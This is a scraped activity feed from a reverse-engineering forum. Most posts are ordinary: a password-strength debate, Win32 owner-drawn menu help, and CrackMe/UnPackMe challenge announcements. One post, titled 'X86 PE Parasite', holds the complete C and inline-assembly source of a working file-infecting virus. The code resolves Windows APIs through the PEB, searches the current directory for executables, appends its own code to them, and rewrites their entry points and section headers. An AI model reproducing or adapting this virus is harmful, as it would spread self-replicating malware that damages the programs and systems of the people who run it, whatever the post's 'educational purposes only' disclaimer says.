Jump to content
Tuts 4 You

All Activity

This stream auto-updates     

  1. Past hour
  2. Teddy Rogers

    Millions using 123456 as password...

    Teddy Rogers replied to Teddy Rogers's topic in General Discussions and Off Topic

    If you think a website is not worthy of a unique and strong password you may as well use a 10 minute throwaway email address to register - or a shared account. I think it good practice to be encouraging users in general and of websites to use and enforce unique and strong passwords. A website may be valuable to you and not to others. The option shouldn't be left open for a person whom values a site risk losing it from using a weak password because there are other users out there that don't care what they use... Ted.
  3. Today
  4. Teddy Rogers
    If you want to display an icon in the menu you can use something like DrawIconEx. If it is a bitmap you can BitBlt or similar. The icon needs to be placed at the beginning of the menu, you then offset the placement of any subsequent text in the menu after the icon. I am not entirely sure what you mean by dynamic icons or what you are trying to achieve - I'll have a guess... The menu will be drawn each time it is requested to be shown, any icons can be reloaded and used in any preferred order. You will need to keep a track of your images and icons as you will need to free up these resources at some time otherwise you will risk GDI leaks. If I am guessing at what you are trying to do with dynamic icons (and if I guessed correctly) there is no way around it, you will have to track your icons handles. I have had to do something similar in the past and used structured arrays with defined types. A dynamic example would be tracking windows; titles, position, order, icon, window handle, etc. This information is captured and stored in a structured array and then the necessary information is displayed in the menu. In the below example I have expanded on the previous code I posted and added icons in to the menu. Code is a bit crude though it gives you the idea... Ted. Coloured Menu Item + Icon.exe
  5. vikash started following How to set diffrent colors in a single menu string?
  6. Yesterday
  7. LCF-AT
    Hi again, I have another question.I have created a menu again with dynamic IDs and Strings using AppendMenu & ModifyMenu (MF_OWNERDRAW) & SetMenuItemBitmaps.If I dont use MF_OWNERDRAW flag = not calling WM_DRAWITEM then the whole menu gets shown right.If I use MF_OWNERDRAW flag then the icons will not shown. So my question in this case is how to show that icon?Is it possible to use SetMenuItemBitmaps function with AppendMenu & ModifyMenu (MF_OWNERDRAW)?How to receive then the bitmap handle of a menu entry in WM_DRAWITEM? My goal is it to set icons X (are dynamic) before I enter WM_DRAWITEM.On the same place where I call AppendMenu / ModifyMenu if possible.In this case I wouldnt need to create a extra array to store ID & icon which belongs to ID into etc. greetz EDIT: I see I also have a problem to use GetMenuString function after I did choose a menu entry.The functions gives a error called Menu_item_not_found in Ownerdraw mode!?In not Ownerdraw mode it works.Strange.The ID & menu handle are correct.
  8. cawk

    Archangel Cloak .NET

    cawk replied to Kazura's question in UnPackMe

    your password is tesfaw https://gyazo.com/37e85be8307829270736eb42156ed9f5 as kao said this isnt unbreakable at all
  9. kao

    Archangel Cloak .NET

    kao replied to Kazura's question in UnPackMe

    @Kazura: That's nonsense. Cloak.NET been broken before and can be broken now. See It's just that people who can unpack that, are not really interested in a very basic crackme.
  10. Rextor Rextor changed their profile photo
  11. blank

    MineSweeper

    blank replied to blank's question in CrackMe

    Thanks for the advice, I uploaded the new version.
  12. ongamanextt ongamanextt joined the community
  13. Eddy^CZ

    MineSweeper

    Eddy^CZ replied to blank's question in CrackMe

    Blank , you need recompile native part under VC 2008 runtime Without depencies to new Windows CRT Runtime.
  14. Kazura

    Archangel Cloak .NET

    Kazura replied to Kazura's question in UnPackMe

    I think nobody can unpack this protector because it's very hard.
  15. blank

    MineSweeper

    blank replied to blank's question in CrackMe

    Hi, can you please check your OS and .NET versions? I only tested it on .NET 4.6.2 EDIT: It seems you will also need the C/C++ runtime library from Microsoft Let me know if you are still facing issues. For me and some other people who tested it, it seems to work.
  16. NeoNCoding

    MineSweeper

    NeoNCoding replied to blank's question in CrackMe

    then it will crash
  17. vikash started following LCF-AT
  18. Last week
  19. blank started following MineSweeper
  20. blank

    MineSweeper

    blank posted a question in CrackMe

    Language: .NET Platform: Windows x32/x64 OS Version: Tested on Windows 10, with .NET 4.6.2 Packer / Protector: WinterStorm 0.1 (Personal Project) Description: Here is a project I've been working on for the last 6 months. It's a follow-up to my previous DynamicMethod attempts. This time I also included some simple JIT hooking. Everything here was written by myself, except a helper class for loading dlls from memory. I hope you'll find it entertaining. I can't wait to hear your thoughts. This is (arguably) the best iteration of the popular game, MineSweeper. Unfortunately, it's a demo, and it only allows for 5 moves. In order to keep playing you have to purchase the full version (contact me for a price 🙂) or to try and patch it. There are 3 checks for the number of moves, that prevent the player from finishing the game. GOALS: Find and remove the first move counter Find and remove the second check Find and remove the third check, making the game playable to the end. BONUS (if you are really bored): There is a secret 'cheat code' that, when used, gives the player a substantial advantage. Find the secret code to master the game. After achieving one, some, or all of the goals, post the patched file and the steps you took. PS: Sorry if the game is a bit slow. Sometimes you have to give it a second between moves. EDIT: If it doesn't run, make sure you have the C runtime library installed too. (specifically, it asks for ucrtbased.dll) EDIT 2: After Eddy's advice, I recompiled the native parts and tried to get rid of most of the useless dependencies. Please download the second version. Screenshot : minesweeper.exe minesweeper2.exe
  21. whoknows
    https://malisper.me/generating-fractals-with-postgres-escape-time-fractals/ bonus1 - hxxps://ourworldindata.org/ bonus2 - hxxps://www.youtube.com/watch?v=Y8EbcG9Ertg
  22. leqici started following First CrackMe
  23. leqici

    First CrackMe

    leqici posted a question in CrackMe

    Language : C# Platform : Windows x64 | x86 OS Version : Windows Packer / Protector : Modded ConfuserEX, Riddle, Enigma Protector (My own config) Description A Simple CrackMe Solve the missing key. Screenshot CrackMe.exe
  24. leqici leqici joined the community
  25. AliAssassiN AliAssassiN joined the community
  26. unnutz unnutz joined the community
  27. itsjame itsjame changed their profile photo
  28. itsjame itsjame joined the community
  29. ruijiexie ruijiexie joined the community
  30. yatablah started following LCF-AT
  31. yatablah started following Teddy Rogers
  32. yatablah yatablah changed their profile photo
  33. ritalin_ ritalin_ changed their profile photo
  34. ritalin_
    For example, right now there's a big frenzy about the new cloud systems or the next big thing on sm,etc.. The open source pi could follow the world to something nicer, some sort of open source system that would allow folks to help humanity in a meaningful way. Even that search engine that plants trees from ad revenue is a start... "Gene manipulation boosts tree growth rate and size" (2015) //// Faculty of Life Sciences, successfully modified two genes in poplar trees, called PXY and CLE, which are responsible for the rate of cell division in tree trunks So if you think about how some systems work, wireless communications and all that, when can humans be open minded about programming for the earth, open source if you will, so some sort of collaboration help each other on the earth via a open system just like GNU, Why would that be a good idea one may ask? and in the end you should philosophically realize just because you're in a separate body from someone else does not mean you do not experience the other beings experiences. So say you cracked the code kid, that does not mean you won't suffer from the lost of cash, because that developer is a experience, so you should view [YOU the cracker] and [Ryan the software developer] from a spectator viewing point, don't you see that you are everyone and everyone is you, of course that excludes karma, rright? Air pollution causes ‘huge’ reduction in intelligence, study reveals Prolonged exposure to air pollution leads to genetic changes in rat brains, study finds philosophy, maybe? GNU , yes..... Open Earth NW, where people's open source work on tree genetics, plant growth,technology scientific to fix the climate, people with diseases..... nanotechnology is cool, but to open the philosophy doors is another.
  35. JMC31337

    X86 PE Parasite

    JMC31337 replied to JMC31337's topic in Malware Reverse Engineering

    That’s just a location in the PEB that can handle some stored dword data tested on a win7, the virtualalloc method (add ecx,600) may not work on others but it can be fixed to do so take care, on to Linux to write one similar
  36. kao
    I really, really disagree. Not all websites are valuable. And not all passwords should chosen to be secure. In fact, this was something I wanted to write about for a long time already, so here it goes: https://lifeinhex.com/my-password-is-password/ (shameless self-promo, I know! )
  37. CodeExplorer

    X86 PE Parasite

    CodeExplorer replied to JMC31337's topic in Malware Reverse Engineering

    Look a bit like my private virus! What are those for? Plus I doubt it will work on any OS different than yours!
  38. ddoosser ddoosser joined the community
  39. nullflex nullflex joined the community
  40. Kazura

    Archangel Cloak .NET

    Kazura posted a question in UnPackMe

    Language : . NET Platform : Windows OS Version : Windows 7/Windows 8/Windows 10 Packer / Protector : Archangel Cloak .NET Description : Unpack the file and attached here. Write tutorial please. Screenshot :  Cloaked.rar
  41. JMC31337

    X86 PE Parasite

    JMC31337 posted a topic in Malware Reverse Engineering

    //./gcc -masm=intel -mwindows -m32 -o file.exe xfile.c //Run the virus under a debugger (the jmp orig EP only works //after first infection is completed - afterwards all files //will infect and run as normal //it will infect 1 exe file per run in current dir //x86 PE Parasite //WARNING! //For educational purposes and virology analysis ONLY! //The author is not responsible for any damage caused //by this code //NOTE: I took some cheap tactics and tricks to get this //to work and its some real convoluted coding //============virt mem array========= //virtallocAPI* [ebp+0x00] (win7) //findfirstfileAPI [ebp+0x04] //findnextfileAPI [ebp+0x08] //CreateFileAPI [ebp+0x0c] //ReadFileAPI [ebp+0x10] //CloseHandleAPI [ebp+0x14] //WriteFileAPI [ebp+0x18] //fileEP [ebp+0x1c] PE+0x28 //fileSecNos [ebp+0x20] PE+0x06 //fileImgSize+4000h [ebp+0x24] PE+0x50 //fileImgBase [ebp+0x28] PE+34 //fileSecVS+4000h [ebp+0x2c] PE+F8+((0x28*[secnos])-20h) //fileSecRS+4000h [ebp+0x30] PE+F8+((0x28*[secnos])-18h) //shellEP [ebp+0x34] //hostloadPTR [ebp+0x38] //GetProcAPI [ebp+0x3c] //LoadLib [ebp+0x40] //k32 base [ebp+0x44] //fhandle [ebp+0x48] //WIN32_FILE_DATA [ebp+0x4C] //WIN32 fname [ebp+WIN32_FILE_DATA+0x2c] //GetFileSizeAPI [ebp+0x100] //FileSize [ebp+0x104] //virtHostAddr [ebp+0x108] //========================================= #include <windows.h> void step() { asm ( ".intel_syntax noprefix\n" //HEURISTICS AV DETECT THIS //BASE WALKING //crypto mem it "_start:\n" "call _start2\n" "_start2:\n" "pop ebx\n" "sub ebx,0x05\n" "pushad\n" "mov [0x7EFDF400],ebx\n" //CHEAP //================================== "mov eax,dword ptr fs:[0x30]\n" "mov eax,dword ptr ds:[eax+0xC]\n" "mov eax,dword ptr ds:[eax+0x14]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax+0x10]\n" //=================================== "mov ebx,eax\n" //eax ebx = k32 base "mov eax,[eax+0x3c]\n" "add eax,ebx\n" //eax=PE "cmp word ptr[eax+0x04],0x014C\n" //0x8664 for x64...0x14c for x86 "jne _end\n" "sub eax,ebx\n" "mov eax,[eax+0x78+ebx]\n" "add eax,ebx\n" "mov edx,eax\n" //edx=imgVA "mov ecx,[edx+0x18]\n" "mov eax,[edx+0x20]\n" "add eax,ebx\n" "_find:\n" "dec ecx\n" "mov edi,[eax+ecx*0x04]\n" "add edi,ebx\n" "cmp dword ptr [edi],0x50746547\n" "jnz _find\n" "cmp dword ptr [edi + 0x04],0x41636f72\n" //Acor "jnz _find\n" "cmp dword ptr [edi + 0x08],0x65726464\n" //erdd "jnz _find\n" "cmp word ptr [edi + 0x0C],0x7373\n" //ss "jnz _find\n" "mov eax,[edx+0x24]\n" "add eax,ebx\n" "mov cx,[eax+ecx*0x02]\n" "mov eax,[edx+0x1c]\n" "add eax,ebx\n" "mov eax,[eax+ecx*0x04]\n" "add eax,ebx\n" "mov edi,eax\n" //edi eax = GetProcAPI "push 0x00\n" //00000000 .... "push 0x41797261\n" //41797261 aryA "push 0x7262694C\n" //7262694C Libr "push 0x64616F4C\n" //64616F4C Load "push esp\n" //esp = loadlibraryA on stack "push ebx\n" //push the k32 base address "call edi\n" "add esp,0x10\n" //clean stack garbage up "mov edx,eax\n" //edx=LoadLibraryA API edi=GetProcAddr "push edx\n" //set virt mem location RWE "push 0x00\n" "push 0x636f6c6c\n" "push 0x416c6175\n" "push 0x74726956\n" "push esp\n" "push ebx\n" "call edi\n" //eax=VirtualAllocAPI "add esp,0x10\n" //clean stack garbage up "push 0x40\n" "push 0x1000\n" "push 0x1000\n" "push 0\n" "call eax\n" //eax=Virtrual RWE mem array "mov ebp,eax\n" //set the ebp pointer to virt mem "mov ecx,edi\n" "add ecx,0x600\n" //win7 virt alloc is -600 getproc "mov [ebp],ecx\n" "mov [ebp+0x3c],edi\n" "mov [ebp+0x44],ebx\n" "pop edx\n" "mov [ebp+0x40],edx\n" //edi=getproc //FindFirstFileA //46 69 6E 64 46 69 72 73 74 46 69 6C 65 41 00 "push 0x004165\n" "push 0x6c694674\n" "push 0x73726946\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x04],eax\n" "add esp,0x10\n" //FindNextFileA //46 69 6E 64 4E 65 78 74 46 69 6C 65 41 00 "push 0x0041\n" "push 0x656c6946\n" "push 0x7478654e\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x08],eax\n" "add esp,0x10\n" //CreateFileA //43 72 65 61 74 65 46 69 6C 65 41 00 "push 0x0041656c\n" "push 0x69466574\n" "push 0x61657243\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x0c],eax\n" "add esp,0x0c\n" //ReadFile //52 65 61 64 46 69 6C 65 00 "push 0x00\n" "push 0x656c6946\n" "push 0x64616552\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x10],eax\n" "add esp,0x0c\n" //CloseHandle //43 6C 6F 73 65 48 61 6E 64 6C 65 00 "push 0x00656c64\n" "push 0x6e614865\n" "push 0x736f6c43\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x14],eax\n" "add esp,0x0c\n" //WriteFile //57 72 69 74 65 46 69 6C 65 00 "push 0x0065\n" "push 0x6c694665\n" "push 0x74697257\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x18],eax\n" "add esp,0x0c\n" //GetFileSize //47 65 74 46 69 6C 65 53 69 7A 65 "push 0x00657a69\n" "push 0x53656c69\n" "push 0x46746547\n" "push esp\n" "push ebx\n" "call edi\n" "mov edx,ebp\n" "add edx,0x100\n" "mov [edx],eax\n" "add esp,0x0c\n" //setup WIN32_FIND_DATA "mov edx,ebp\n" "add edx,0x2c\n" "add edx,0x4c\n" "mov dword ptr[edx],0x78652e2a\n" "mov dword ptr[edx+0x4],0x0065\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x04]\n" "call edx\n" //FindFirstFile "cmp eax,0x00\n" //eax 0 = no file "je _end\n" "mov [ebp+0x48],eax\n" //open file to see if it has RW privs "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xC0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "_findret:\n" //GetFileSize //eax=file handle "push eax\n" "mov edx,ebp\n" "add edx,0x104\n" "push edx\n" "sub edx,0x04\n" "push eax\n" "mov edx,[edx]\n" "call edx\n" "mov [ebp+0x104],eax\n" "mov edx,eax\n" "add edx,0x4000\n" //inc fsize + 4000h "push 0x40\n" //PAGE_EXECUTE_READWRITE "push 0x1000\n" //MEM_COMMIT "push edx\n" //size "push 0x00\n" //virt addr "mov edx,[ebp]\n" "call edx\n" "mov [ebp+0x108],eax\n" //ReadFile "mov edx,0x00\n" "push edx\n" "mov edx,ebp\n" "add edx,0x10c\n" //ebp+10c hold the bytes read ret "push edx\n" "mov edx,ebp\n" "add edx,0x104\n" "mov edx,[edx]\n" //"add edx,0x4000\n" "push edx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" "push edx\n" "mov edx,[esp+0x10]\n" "push edx\n" "mov edx,[ebp+0x10]\n" "call edx\n" //ReadFile (ebp+0x108 = virt file) "add esp,0x04\n" //CloseHandle "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x14]\n" "call edx\n" //DETECT EOF "X" IF HOST IS INFECTED //CLOSEHANDLE B4 findnext?? "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "dec edx\n" "cmp byte ptr [edx],0x58\n" "je _findnext\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "cmp word ptr [edx+0x04],0x014c\n" //x86 parasite "jne _findnext\n" //***************************************8 //place host's EP into 0x7EFDF404 // and host's PE+ 0xbc //since we'll overwrite orig EP //to point to shell "push edx\n" "mov ecx,edx\n" "add ecx,0xbc\n" //"mov ecx,[edx+0xbc]\n" //host PE not used location "mov eax,[edx+0x34]\n" //eax=hostBaseAddr "add edx,0x28\n" "mov edx,[edx]\n" "add edx,eax\n" "mov [ecx],edx\n" "mov [0x7efdf404],edx\n" "pop edx\n" //****************************************8 "mov ecx,[edx+0x28]\n" //here--------------------------------------------------- "mov ecx,[0x7EFDF404]\n" "mov [edx+0xbc],ecx\n" "mov [ebp+0x200],ecx\n" //------------------------------------------------------- "mov [ebp+0x1c],ecx\n" "xor ecx,ecx\n" "mov cx,word ptr[edx+0x06]\n" "mov [ebp+0x20],ecx\n" "mov ecx,[edx+0x50]\n" "mov [ebp+0x24],ecx\n" "mov ecx,[edx+0x34]\n" "mov [ebp+0x28],ecx\n" "mov ecx,edx\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "mov edx,[ecx]\n" "mov [ebp+0x2c],edx\n" "add ecx,0x08\n" "mov edx,[ecx]\n" "mov [ebp+0x30],edx\n" //edx=PE sec vs "mov edx,[ebp+0x2c]\n" "add edx,0x4000\n" "mov [ebp+0x2c],edx\n" "mov edx,[ebp+0x30]\n" "add edx,0x4000\n" "mov [ebp+0x30],edx\n" "mov edx,[ebp+0x24]\n" "add edx,0x4000\n" "mov [ebp+0x24],edx\n" "push 0x006c6c\n" "push 0x642e3233\n" "push 0x72657375\n" "mov edx,[ebp+0x40]\n" "push esp\n" "call edx\n" "add esp,0x0c\n" "push 0x0041786f\n" "push 0x42656761\n" "push 0x7373654d\n" "push esp\n" "push eax\n" "mov edx,[ebp+0x3c]\n" "call edx\n" "add esp,0x08\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "call eax\n" "add esp,0x04\n" //DETECT virus -> host //DETECT infectedHOST -> host "_peNFX:\n" "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "mov ecx,0x550\n" "mov esi,[0x7EFDF400]\n" //"add esi,[ebp+0x108]\n" "mov edi,edx\n" "rep movsb\n" "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "push ecx\n" "mov edx,ebp\n" "add edx,0x28\n" "mov edx,[edx]\n" "add edx,[ebp+0x1c]\n" "mov ecx,[ebp+0x104]\n" "add ecx,0x4000\n" //================================== //notes: //*change hostEP "mov edx,[esp]\n" "mov eax,[edx+0x0c]\n" //eax=RO "sub ecx,eax\n" "mov eax,[edx+0x04]\n" //edx=VO "add ecx,eax\n" "mov [ebp+0x34],ecx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" //change VS "mov edx,[esp]\n" "mov eax,[ebp+0x2c]\n" "mov [edx],eax\n" //change RS "mov edx,[esp]\n" "add edx,0x08\n" "mov eax,[ebp+0x30]\n" "mov [edx],eax\n" //change imgsize "mov edx,[esp]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x50\n" "mov eax,[ebp+0x24]\n" "mov [edx],eax\n" //add "X" EOF indication "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "add edx,0x4000\n" "dec edx\n" "mov byte ptr[edx],0x58\n" //reopen file for write //when using valloc //we cant access a file //for read then write one shot //its one then the other "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0x40000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" //shell_raw_location - ro + vo + imgbase //change hostEP "mov eax,[ebp+0x108]\n" "add eax,[ebp+0x104]\n" "add eax,0x502\n" //CHEAP "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "push edx\n" //"mov edx,[0x010075]\n" //CHEAP "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov edx,[edx]\n" "pop ecx\n" "add edx,ecx\n" //"mov [eax],edx\n" "mov [0x7EFDF400],edx\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov ecx,[ebp+0x104]\n" //"sub ecx,0x4000\n" "mov edx,[esp]\n" "sub ecx,[edx+0x0c]\n" "add ecx,[edx+0x04]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov [edx],ecx\n" /* "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "mov edx,[0x7EFDF404]\n" "add ecx,0xbc\n" "mov [ecx],edx\n" */ //writefile "push 0x00\n" "mov edx,ebp\n" "add edx,0x10c\n" "mov dword ptr[edx],0x000000\n" "push edx\n" "mov edx,[ebp+0x104]\n" "add edx,0x4000\n" "push edx\n" "mov edx,[ebp+0x108]\n" "push edx\n" "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x18]\n" "call edx\n" "pop eax\n" "jmp _end\n" "_findnext:\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,[ebp+0x48]\n" "push edx\n" "mov edx,[ebp+0x08]\n" "call edx\n" "cmp eax,0x00\n" "je _end\n" "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xc0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFileA "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "jmp _findret\n" //detect eax=0 and eax=ffffffff "_end:\n" "popad\n" "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "mov ecx,edx\n" "add ecx,[ecx+0x3c]\n" "mov edx,[ecx+0xbc]\n" "jmp edx\n" "push eax\n" "push eax\n" ); }//end step fx int WINAPI WinMain(HINSTANCE h, HINSTANCE h2, LPSTR lp, int i) { asm("pop ebp\n"); asm("call _start\n"); MessageBoxA(0,0,0,0); }
  42. vikash vikash joined the community
  43. SkyProud

    Millions using 123456 as password...

    SkyProud replied to Teddy Rogers's topic in General Discussions and Off Topic

    rockyou.txt is really big in size, 130+MB, downloading it to check myself.🙂
  44. Nemo
    if the password you want is in rockyou.txt use another one
  45. Mallu Mallu changed their profile photo
  46. Mallu Mallu joined the community
  47. Teddy Rogers
    Any sites that let you sign up and register using a weak password are just as bad as the people willing to use them... https://www.bbc.co.uk/news/technology-47974583 Ted.
  48. wabafit

    Modified ConfuserEx

    wabafit replied to wabafit's question in CrackMe

    Please post the executable and, if possible steps you took to manage to reverse it. Thank you!
  49. tiberius07

    Free Ubisoft and Epic PC Games...

    tiberius07 replied to Teddy Rogers's topic in General Discussions and Off Topic

    Epic Store has been giving free games since they launched in December 2018. They give new free games every two weeks. Currently, it's Transistor as Teddy Rogers said. Next one is World of Goo.
  50. Progman
    MFT_OWNERDRAW flag should get the messages sent. It should be set on creation as in Ted's example above or possibly other ways like SetStyle API.
  1. Load more activity
×
×
  • Create New...